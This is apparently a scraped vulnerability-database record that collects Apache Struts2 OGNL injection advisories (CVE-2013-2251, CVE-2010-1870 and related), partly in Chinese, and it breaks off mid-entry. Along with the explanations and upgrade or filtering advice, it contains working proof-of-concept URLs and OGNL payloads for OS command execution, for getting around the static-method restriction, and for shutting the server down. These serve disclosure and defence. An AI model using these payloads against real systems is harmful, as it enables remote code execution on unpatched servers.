\nhttps://cwiki.apache.org/confluence/display/WW/ActionMapper \n \n<How the Attack Works> \n \nAs stated already, there are four types of prefixed parameters. \n \naction:, redirect:, redirectAction:, method: \n \nAll except for method: can be used for attacks. But regarding action:, \nit can be used only if wildcard mapping is enabled in configuration. \nOn the one hand, redirect: and redirectAction: are not constrained by \nconfiguration (thus they are convenient for attackers). \n \nOne thing that should be noted is that prefixed parameters are quite \nforceful. It means that behavior of application which is not intended \nto accept prefixed parameters can also be overwritten by prefixed \nparameters added to HTTP request. Therefore all Struts2 applications \nthat use DefaultActionMapper are vulnerable to the attack. \n \nThe injection point is name of prefixed parameters. \nExample of attack using redirect: is shown below. \n \nAttack URI: \n/bar.action?redirect:http://www.google.com/%25{1000-1} \n \nResponse Header: \nHTTP/1.1 302 Found \nLocation: http://www.google.com/999 \n \nAs you can see, expression (1000-1) is evaluated and the result (999) \nis appeared in Location response header. As I shall explain later, \nmore complex attacks such as OS command execution is possible too. \n \nIn DefaultActionMapper, name of prefixed parameter is once stored as \nActionMapping object and is later executed as OGNL expression. \nRough method call flow in execution phase is as the following. \n \norg.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter() \norg.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction() \norg.apache.struts2.dispatcher.Dispatcher.serviceAction() \norg.apache.struts2.dispatcher.StrutsResultSupport.execute() \norg.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse() \ncom.opensymphony.xwork2.util.TextParseUtil.translateVariables() \ncom.opensymphony.xwork2.util.OgnlTextParser.evaluate() \n \nProof of Concept: \n<PoC URLs> \n \nPoC is already disclosed on vender's web page. \nhttps://struts.apache.org/release/2.3.x/docs/s2-016.html \n \nBelow PoC URLs are just quotes from the vender's page. \n \nSimple Expression: \nhttp://host/struts2-blank/example/X.action?action:%25{3*4} \nhttp://host/struts2-showcase/employee/save.action?redirect:%25{3*4} \n \nOS Command Execution: \nhttp://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \nhttp://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \nhttp://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \n \nObviously such attacks are not specific to blank/showcase application, \nbut all Struts2 based applications may be subject to attacks. \n \n<OS Command Execution and Static Method Call> \n \nAnother topic that I think worth mentioning is that PoC URLs use \nProcessBuilder class to execute OS commands. The merit of using this \nclass is that it does not require static method to execute OS commands, \nwhile Runtime class does require it. \n \nAs you may know, static method call in OGNL is basically prohibited. \nBut in Struts2 <= v2.3.14.1 this restriction was easily bypassed by \na simple trick: \n \n%{#_memberAccess['allowStaticMethodAccess']=true, \n@java.lang.Runtime@getRuntime().exec('your commands')} \n \nIn Struts v2.3.14.2, SecurityMemberAccess class has been changed to \nprevent the trick. However there are still some techniques to call \nstatic method in OGNL. \n \nOne technique is to use reflection to replace static method call to \ninstance method call. Another technique is to overwrite #_memberAccess \nobject itself rather than property of the object: \n \n%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true), \n@java.lang.Runtime@getRuntime().exec('your commands')} \n \nProbably prevention against static method is just an additional layer \nof defense, but I think that global objects such as #_memberAccess \nshould be protected from rogue update. \n \nTimeline: \n2013/06/24 Reported to Struts Security ML \n2013/07/17 Vender announced v2.3.15.1 \n2013/08/10 Disclosure of this advisory \n \nRecommendation: \nImmediate upgrade to the latest version is strongly recommended as \nactive attacks have already been observed. It should be noted that \nredirect: and redirectAction: parameters were completely dropped and \ndo not work in the latest version as stated in the vender's page. \nThus attention for compatibility issues is required for upgrade. \n \nIf you cannot upgrade your Struts2 immediately, filtering (by custom \nservlet filter, IPS, WAF and so on) can be a mitigation solution for \nthis vulnerability. Some points about filtering solution are listed \nbelow. \n \n- Both %{expr} and ${expr} notation can be used for attacks. \n- Parameters both in querystring and in request body can be used. \n- redirect: and redirectAction: can be used not only for Java method \nexecution but also for open redirect. \n \nSee S2-017 (CVE-2013-2248) for open redirect issue. \nhttps://struts.apache.org/release/2.3.x/docs/s2-017.html \n \nReference: \nhttps://struts.apache.org/release/2.3.x/docs/s2-016.html \nhttps://cwiki.apache.org/confluence/display/WW/ActionMapper \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122796/struts2315ognl-inject.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:42:29", "description": "BUGTRAQ ID: 60167\r\nCVE(CAN) ID: CVE-2013-2115\r\n\r\nStruts2 \u662f\u7b2c\u4e8c\u4ee3\u57fa\u4e8eModel-View-Controller (MVC)\u6a21\u578b\u7684java\u4f01\u4e1a\u7ea7web\u5e94\u7528\u6846\u67b6\u3002\u5b83\u662fWebWork\u548cStruts\u793e\u533a\u5408\u5e76\u540e\u7684\u4ea7\u7269\u3002\r\n\r\nApache Struts 2.0.0-2.3.14.1\u5b58\u5728\u672a\u5f7b\u5e95\u4fee\u590d\u7684\u5b89\u5168\u63aa\u65bd\u7ed5\u8fc7\u6f0f\u6d1e\uff08CVE-2013-1966\uff09\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u4ee5\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u6b64\u6f0f\u6d1e\u5df2\u7ecf\u5728Struts 2.3.14.2\u4e2d\u4fee\u590d\u3002\r\n0\r\nApache Group Struts2 2.0.0 - 2.3.14.1\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache\r\n------\r\nApache\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08S2-014\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nS2-014\uff1aA vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks\r\n\u94fe\u63a5\uff1ahttps://cwiki.apache.org/confluence/display/WW/S2-014", "cvss3": {}, "published": "2013-05-30T00:00:00", "title": "Apache Struts 'includeParams' \u4e0d\u5b8c\u6574\u4fee\u590d\u5b89\u5168\u7ed5\u8fc7\u6f0f\u6d1e(CVE-2013-2115)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-05-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60812", "id": "SSV:60812", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:54:02", "description": "BUGTRAQ ID: 60346\r\nCVE(CAN) ID: CVE-2013-2134\r\n\r\nStruts2 \u662f\u7b2c\u4e8c\u4ee3\u57fa\u4e8eModel-View-Controller (MVC)\u6a21\u578b\u7684java\u4f01\u4e1a\u7ea7web\u5e94\u7528\u6846\u67b6\u3002\u5b83\u662fWebWork\u548cStruts\u793e\u533a\u5408\u5e76\u540e\u7684\u4ea7\u7269\u3002\r\n\r\nApache Struts 2.0.0-2.3.14.3\u5b58\u5728\u8fdc\u7a0bOGNL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u64cd\u4f5c\u670d\u52a1\u5668\u7aef\u5bf9\u8c61\u5e76\u5728\u53d7\u5f71\u54cd\u5e94\u7528\u4e0a\u4e0b\u6587\u4e2d\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\u6b64\u6f0f\u6d1e\u6e90\u4e8e\u901a\u914d\u7b26\u5339\u914d\u9519\u8bef\u3002\r\n0\r\nApache Group Struts 2.x\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache Group\r\n------------\r\nApache Group\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08s2-015\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\ns2-015\uff1aS2-015\r\n\u94fe\u63a5\uff1ahttp://struts.apache.org/development/2.x/docs/s2-015.html\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1ahttp://struts.apache.org/download.cgi#struts23143", "cvss3": {}, "published": "2013-06-11T00:00:00", "type": "seebug", "title": "Apache Struts OGNL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e(CVE-2013-2134)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2134"], "modified": "2013-06-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60836", "id": "SSV:60836", "sourceData": "\n http://www.example.com/example/%24%7B%23foo%3D%27Menu%27%2C%23foo%7D\r\n\r\nhttp://www.example.com/example/${#foo='Menu',#foo}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60836", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:41:13", "description": "CVE-2013-2251\r\nStruts2 \u662f\u7b2c\u4e8c\u4ee3\u57fa\u4e8eModel-View-Controller (MVC)\u6a21\u578b\u7684java\u4f01\u4e1a\u7ea7web\u5e94\u7528\u6846\u67b6\u3002\u5b83\u662fWebWork\u548cStruts\u793e\u533a\u5408\u5e76\u540e\u7684\u4ea7\u7269\r\n\r\nApache Struts2\u7684action:\u3001redirect:\u548credirectAction:\u524d\u7f00\u53c2\u6570\u5728\u5b9e\u73b0\u5176\u529f\u80fd\u7684\u8fc7\u7a0b\u4e2d\u4f7f\u7528\u4e86Ognl\u8868\u8fbe\u5f0f\uff0c\u5e76\u5c06\u7528\u6237\u901a\u8fc7URL\u63d0\u4ea4\u7684\u5185\u5bb9\u62fc\u63a5\u5165Ognl\u8868\u8fbe\u5f0f\u4e2d\uff0c\u4ece\u800c\u9020\u6210\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u6784\u9020\u6076\u610fURL\u6765\u6267\u884c\u4efb\u610fJava\u4ee3\u7801\uff0c\u8fdb\u800c\u53ef\u6267\u884c\u4efb\u610f\u547d\u4ee4\r\n\r\nredirect:\u548credirectAction:\u6b64\u4e24\u9879\u524d\u7f00\u4e3aStruts\u9ed8\u8ba4\u5f00\u542f\u529f\u80fd\uff0c\u76ee\u524dStruts 2.3.15.1\u4ee5\u4e0b\u7248\u672c\u5747\u5b58\u5728\u6b64\u6f0f\u6d1e\r\n\r\n\u76ee\u524dApache Struts2\u5df2\u7ecf\u57282.3.15.1\u4e2d\u4fee\u8865\u4e86\u8fd9\u4e00\u6f0f\u6d1e\u3002\u5f3a\u70c8\u5efa\u8baeApache Struts2\u7528\u6237\u68c0\u67e5\u60a8\u662f\u5426\u53d7\u6b64\u95ee\u9898\u5f71\u54cd\uff0c\u5e76\u5c3d\u5feb\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\r\n0\r\nApache Struts 2.0.0 - Apache Struts 2.3.15\r\n\u5382\u5546\u72b6\u6001\uff1a\r\n==========\r\n\u5382\u5546\u5df2\u7ecf\u53d1\u5e03Apache Struts 2.3.15.1\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u6f0f\u6d1e\uff0c\u5efa\u8baeStruts\u7528\u6237\u53ca\u65f6\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\u3002\r\n\r\n\u5382\u5546\u5b89\u5168\u516c\u544a\uff1aS2-016\r\n\u94fe\u63a5\uff1ahttp://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\n\u8f6f\u4ef6\u5347\u7ea7\u9875\u9762\uff1ahttp://struts.apache.org/download.cgi#struts23151", "cvss3": {}, "published": "2013-07-17T00:00:00", "title": "Apache Struts2 \u591a\u4e2a\u524d\u7f00\u53c2\u6570\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e(CVE-2013-2251)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2013-07-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60906", "id": "SSV:60906", "sourceData": "\n \u7531\u4e8eApache Struts2 \u5728\u6700\u65b0\u4fee\u8865\u7248\u672c2.3.15.1\u4e2d\u5df2\u7ecf\u7981\u7528\u4e86\u91cd\u5b9a\u5411\u53c2\u6570\uff0c\u56e0\u6b64\u53ea\u8981\u91cd\u5b9a\u5411\u529f\u80fd\u4ecd\u7136\u6709\u6548\uff0c\u5219\u8bf4\u660e\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\uff1a\r\n\r\nhttp://host/struts2-showcase/employee/save.action?redirect:http://www.yahoo.com/\r\n\r\n\u5982\u679c\u9875\u9762\u91cd\u5b9a\u5411\u5230www.yahoo.com\uff0c\u5219\u8868\u660e\u5f53\u524d\u7cfb\u7edf\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\u3002\r\n\r\n\u9a8c\u8bc1\u8868\u8fbe\u5f0f\u89e3\u6790\u548c\u547d\u4ee4\u6267\u884c\uff1a\r\n\r\nhttp://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\nhttp://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60906", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:04:07", "description": "CVE ID: CVE-2010-1870\r\n\r\nVMware vCenter Orchestrator\u662f\u81ea\u52a8\u7ba1\u7406\u4efb\u52a1\u7684\u5e94\u7528\u7a0b\u5e8f\u3002Alive Enterprise\u662f\u76d1\u7ba1\u8fdb\u7a0b\u7684\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nVMware vCenter Orchestrator\u548cAlive Enterprise\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u4e24\u4e2a\u4ea7\u54c1\u4e2d\u90fd\u5d4c\u5165\u4e86\u7b2c\u4e09\u65b9\u7ec4\u4ef6Apache Struts\uff0c\u6b64\u7ec4\u4ef6\u4e2d\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u53ef\u5141\u8bb8\u6076\u610f\u7528\u6237\u7ed5\u8fc7ParametersInterceptor\u5185\u7684'#'-usage\u4fdd\u62a4\uff0c\u4f7f\u670d\u52a1\u5668\u7aefcontext\u5bf9\u8c61\u53d7\u63a7\u3002\r\n\n\nVMWare VMware vCenter Orchestrator 4.1\r\nVMWare VMware vCenter Orchestrator 4.0\r\nVMWare Alive Enterprise 7.2\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nVMWare\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.vmware.com", "cvss3": {}, "published": "2011-05-10T00:00:00", "title": "VMware vCenter Orchestrator\u548cAlive Enterprise\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2011-05-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20526", "id": "SSV:20526", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T18:09:11", "description": "No description provided by source.", "cvss3": {}, "published": "2010-07-15T00:00:00", "type": "seebug", "title": "Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2010-07-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19954", "id": "SSV:19954", "sourceData": "\n Friday, July 9, 2010\r\nCVE-2010-1870: Struts2/XWork remote command execution\r\nUpdate Tue Jul 13 2010: Added proof of concept\r\n \r\nApache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I've reported to them on May 31st 2010. Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed.\r\n \r\nIntroduction\r\nStruts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. OGNL (Object Graph Navigation Language) is what turns:\r\n \r\nuser.address.city=Bishkek&user['favoriteDrink']=kumys\r\n \r\ninto\r\n \r\naction.getUser().getAddress().setCity("Bishkek")\r\naction.getUser().setFavoriteDrink("kumys")\r\n \r\nThis is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments.\r\nNOTE: If you are using XWork's ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml).\r\n \r\nIn addition to property getting/setting, OGNL supports many more features:\r\n \r\n * Method calling: foo()\r\n * Static method calling: @java.lang.System@exit(1)\r\n * Constructor calling: new MyClass()\r\n * Ability to work with context variables: #foo = new MyClass()\r\n * And more...\r\n \r\nSince HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution:\r\n \r\n * OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default)\r\n * SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default)\r\n \r\nOGNL Context variables\r\nTo make it easier for developer to access various frequently needed objects XWork provides several predefined context variables:\r\n \r\n * #application\r\n * #session\r\n * #request\r\n * #parameters\r\n * #attr\r\n \r\nThese variables represent various server-side objects, such as session map. To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java's unicode String representation: \\u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further.\r\n \r\nCVE-2010-1870\r\nEarlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more:\r\n \r\n * #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor.denyMethodExecution' property value.\r\n * #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.\r\n * #root\r\n * #this\r\n * #_typeResolver\r\n * #_classResolver\r\n * #_traceEvaluations\r\n * #_lastEvaluation\r\n * #_keepLastEvaluation\r\n \r\nYou can probably see the problem already. Using XW-641 trick I was able to modify the values that were guarding Java methods execution and run arbitrary Java code:\r\n \r\n#_memberAccess['allowStaticMethodAccess'] = true\r\n#foo = new java .lang.Boolean("false")\r\n#context['xwork.MethodAccessor.denyMethodExecution'] = #foo\r\n#rt = @java.lang.Runtime@getRuntime()\r\n#rt.exec('mkdir /tmp/PWNED')\r\n \r\nActual proof of concept had to use OGNL's expression evaluation when crafting HTTP request. PoC for this bug will be published on July 12 2010. To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1):\r\n \r\n \r\nhttp://mydomain/MyStruts.action?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.den\r\nyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\\u0023rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRunti\r\nme()))=1\r\n \r\n \r\nFixing CVE-2010-1870\r\nStruts2 users must upgrade to the 2.2.0, which whitelists a set of characters that excludes characters required to exploit this vulnerability.\r\n \r\n \r\nIn cases where upgrade isn't possible you can use ParameterInterceptor's "excludeParams" parameter to whitelist the characters required for your application to operate correctly(usually A-z0-9_.'"[]) alternatively you can blacklist \\()@ which are the characters required to exploit this bug.\r\n \r\nTimeline\r\nMay 31st - email to security@struts.apache.org with vulnerability report.\r\nJune 4th - no response received, contacted developers again.\r\nJune 5th - had to find an XWork developer on IRC to look at this.\r\nJune 16th - Atlassian fixes vulnerability in its products. Atlassian and Struts developers worked together in coming up with the fix.\r\nJune 20th - 1-line fix commited\r\nJune 29th - Struts 2.2.0 release voting process started and is still going...\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19954", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T13:32:55", "description": "## \u6f0f\u6d1e\u8be6\u60c5\r\n\r\n\u5728struts2\u4e2d\uff0cDefaultActionMapper\u7c7b\u652f\u6301\u4ee5\"action:\"\u3001\"redirect:\"\u3001\"redirectAction:\"\u4f5c\u4e3a\u5bfc\u822a\u6216\u662f\u91cd\u5b9a\u5411\u524d\u7f00\uff0c\u4f46\u662f\u8fd9\u4e9b\u524d\u7f00\u540e\u9762\u540c\u65f6\u53ef\u4ee5\u8ddfOGNL\u8868\u8fbe\u5f0f\uff0c\u7531\u4e8estruts2\u6ca1\u6709\u5bf9\u8fd9\u4e9b\u524d\u7f00\u505a\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u5229\u7528OGNL\u8868\u8fbe\u5f0f\u8c03\u7528java\u9759\u6001\u65b9\u6cd5\u6267\u884c\u4efb\u610f\u7cfb\u7edf\u547d\u4ee4\u3002\r\n\r\n\u8fd9\u91cc\u4ee5\u201credirect:\u201d\u524d\u7f00\u4e3e\u4f8b\uff0cstruts2\u4f1a\u5c06\u201credirect:\u201d\u524d\u7f00\u540e\u9762\u7684\u5185\u5bb9\u8bbe\u7f6e\u5230redirect.location\u5f53\u4e2d\uff0c\u8fd9\u91cc\u6211\u4eec\u4e00\u6b65\u6b65\u8ddf\u8e2a\uff0c\u9996\u5148\u662f\u8fd9\u4e2agetMapping\u51fd\u6570\u8ddf\u5165\r\n\r\n\r\n\r\n\u8fd9\u91cc\u4e00\u76f4\u5230\u8fd9\u4e2ahandleSpecialParameters()\uff0c\u7ee7\u7eed\u8ddf\u5165\r\n\r\n\r\n\r\n\r\n\r\n\u8fd9\u91cc\u771f\u6b63\u4f20\u5165OGNL\u8868\u8fbe\u5f0f\u662f\u5728\u8fd9\u4e2aparameterAction.execute()\u4e2d\uff0c\u7ee7\u7eed\u8ddf\u5165\u6765\u5230DefaultActionMapper.java\u7684\u4ee3\u7801\r\n\r\n\r\n\r\n\u7136\u800c\u4e0a\u9762\u7684\u8fc7\u7a0b\u53ea\u662f\u4f20\u9012OGNL\u8868\u8fbe\u5f0f\uff0c\u771f\u6b63\u6267\u884c\u662f\u5728\u540e\u9762\uff0c\u8fd9\u91cc\u662f\u5728FilterDispatcher\u7c7b\u4e2d\u7684dispatcher.serviceAction()\u65b9\u6cd5\uff0c\u8fd9\u91cc\u7684mapping\u5bf9\u8c61\u4e2d\u8bbe\u7f6e\u4e86\u4f20\u5165\u7684OGNL\r\n\r\n\r\n\r\n\u8fd9\u91cc\u8ddf\u5165\u65b9\u6cd5\u6700\u7ec8\u4f1a\u5728TextParseUtil\u8fd9\u4e2a\u7c7b\u7684\u8c03\u7528stack.findValue()\u65b9\u6cd5\u6267\u884cOGNL\u3002\r\n\r\n\r\n\r\n\u8be6\u60c5\u6765\u6e90\uff1ahttp://drops.wooyun.org/papers/902", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "Struts2/XWork < 2.2.0 - Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-69390", "id": "SSV:69390", "sourceData": "\n Friday, July 9, 2010\r\nCVE-2010-1870: Struts2/XWork remote command execution\r\nUpdate Tue Jul 13 2010: Added proof of concept\r\n\r\nApache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I've reported to them on May 31st 2010. Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed.\r\n\r\nIntroduction\r\nStruts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. OGNL (Object Graph Navigation Language) is what turns:\r\n\r\nuser.address.city=Bishkek&user['favoriteDrink']=kumys\r\n\r\ninto\r\n\r\naction.getUser().getAddress().setCity("Bishkek")\r\naction.getUser().setFavoriteDrink("kumys")\r\n\r\nThis is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments.\r\nNOTE: If you are using XWork's ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml).\r\n\r\nIn addition to property getting/setting, OGNL supports many more features:\r\n\r\n * Method calling: foo()\r\n * Static method calling: @java.lang.System@exit(1)\r\n * Constructor calling: new MyClass()\r\n * Ability to work with context variables: #foo = new MyClass()\r\n * And more...\r\n\r\nSince HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution:\r\n\r\n * OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default)\r\n * SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default)\r\n\r\nOGNL Context variables\r\nTo make it easier for developer to access various frequently needed objects XWork provides several predefined context variables:\r\n\r\n * #application\r\n * #session\r\n * #request\r\n * #parameters\r\n * #attr\r\n\r\nThese variables represent various server-side objects, such as session map. To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java's unicode String representation: \\u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further. \r\n\r\nCVE-2010-1870\r\nEarlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more:\r\n\r\n * #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor.denyMethodExecution' property value.\r\n * #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.\r\n * #root\r\n * #this\r\n * #_typeResolver\r\n * #_classResolver\r\n * #_traceEvaluations\r\n * #_lastEvaluation\r\n * #_keepLastEvaluation\r\n\r\nYou can probably see the problem already. Using XW-641 trick I was able to modify the values that were guarding Java methods execution and run arbitrary Java code:\r\n\r\n#_memberAccess['allowStaticMethodAccess'] = true\r\n#foo = new java .lang.Boolean("false")\r\n#context['xwork.MethodAccessor.denyMethodExecution'] = #foo\r\n#rt = @java.lang.Runtime@getRuntime()\r\n#rt.exec('mkdir /tmp/PWNED')\r\n\r\nActual proof of concept had to use OGNL's expression evaluation when crafting HTTP request. PoC for this bug will be published on July 12 2010. To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1):\r\n\r\n\r\nhttp://mydomain/MyStruts.action?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.den\r\nyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\\u0023rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRunti\r\nme()))=1\r\n\r\n\r\nFixing CVE-2010-1870\r\nStruts2 users must upgrade to the 2.2.0, which whitelists a set of characters that excludes characters required to exploit this vulnerability.\r\n\r\n\r\nIn cases where upgrade isn't possible you can use ParameterInterceptor's "excludeParams" parameter to whitelist the characters required for your application to operate correctly(usually A-z0-9_.'"[]) alternatively you can blacklist \\()@ which are the characters required to exploit this bug.\r\n\r\nTimeline\r\nMay 31st - email to security@struts.apache.org with vulnerability report.\r\nJune 4th - no response received, contacted developers again.\r\nJune 5th - had to find an XWork developer on IRC to look at this.\r\nJune 16th - Atlassian fixes vulnerability in its products. Atlassian and Struts developers worked together in coming up with the fix.\r\nJune 20th - 1-line fix commited\r\nJune 29th - Struts 2.2.0 release voting process started and is still going...\r\n\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-69390", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T17:42:34", "description": "No description provided by source.", "cvss3": {}, "published": "2013-05-24T00:00:00", "title": "Apache Struts2 includeParams\u5c5e\u6027\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e(CVE-2013-1966)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1966"], "modified": "2013-05-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60807", "id": "SSV:60807", "sourceData": "\n \u6253\u5f00Struts Blank App\u4e2d\u7684 HelloWorld.jsp\u589e\u52a0\u7c7b\u4f3c\u4e0b\u5217\u4ee3\u7801\uff1a\r\n\r\n<s:url id="url" 